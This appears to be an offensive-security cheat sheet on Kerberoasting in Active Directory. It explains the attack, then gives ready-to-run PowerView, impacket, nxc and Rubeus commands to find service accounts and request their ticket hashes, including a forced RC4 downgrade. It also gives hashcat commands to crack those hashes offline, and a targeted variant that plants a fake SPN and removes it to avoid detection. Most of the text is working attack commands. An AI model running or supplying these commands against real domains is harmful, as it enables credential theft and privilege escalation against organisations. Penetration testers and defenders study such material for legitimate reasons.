Security Notes

Appearance

Kerberoasting

Any authenticated domain user can request a TGS (service ticket) for any account with a registered SPN. The KDC encrypts part of the TGS with the service account's NTLM hash: take that ticket offline and crack the hash without further interaction with the domain.

Why It Works

  • SPNs identify service accounts (e.g. MSSQLSvc/db.domain.local:1433)
  • The TGS is encrypted with RC4-HMAC (etype 23) or AES256 (etype 18) using the service account's password hash
  • No special privileges required: any domain user can request tickets
  • RC4 hashes crack significantly faster than AES256

Finding Kerberoastable Accounts

Look for user accounts (not computer accounts) with SPNs: service accounts are the target, especially ones that look like they have weak passwords.

powershell
# PowerView
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname, description

# setspn (built-in)
setspn -T domain.local -Q */*
bash
# impacket: list without requesting
GetUserSPNs.py domain.local/user:pass -dc-ip <ip>

# nxc
nxc ldap <ip> -u user -p pass --kerberoast output.txt

Requesting Hashes

Request the TGS and save hashes for offline cracking.

bash
# impacket: request all Kerberoastable hashes
GetUserSPNs.py domain.local/user:pass -dc-ip <ip> -request -outputfile hashes.txt

# Request for specific account
GetUserSPNs.py domain.local/user:pass -dc-ip <ip> -request-user svc_sql -outputfile hashes.txt
powershell
# Rubeus: all accounts
Rubeus.exe kerberoast /outfile:hashes.txt

# Rubeus: specific account
Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt

# Force RC4 (faster to crack: downgrade if AES is returned)
Rubeus.exe kerberoast /tgtdeleg /rc4opsec /outfile:hashes.txt

Cracking

RC4 hashes (etype 23, $krb5tgs$23$*) crack much faster than AES256: try to force RC4 with /tgtdeleg if the service account is RC4 capable.

bash
# RC4 (etype 23): hashcat mode 13100
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# AES256 (etype 18): hashcat mode 19700
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt

Targeted Kerberoasting

If you have GenericWrite on a user account, you can set an SPN on it, request the TGS, then clean up: useful for accounts that don't normally have SPNs.

powershell
# Step 1: Set SPN on target account
Set-DomainObject -Identity target_user -Set @{serviceprincipalname='fake/spn.domain.local'}

# Verify it was set
Get-DomainUser target_user | Select-Object serviceprincipalname
bash
# Step 2: Request the TGS
GetUserSPNs.py domain.local/user:pass -dc-ip <ip> -request-user target_user -outputfile targeted.txt
powershell
# Step 3: Clean up (remove SPN to avoid detection)
Set-DomainObject -Identity target_user -Clear serviceprincipalname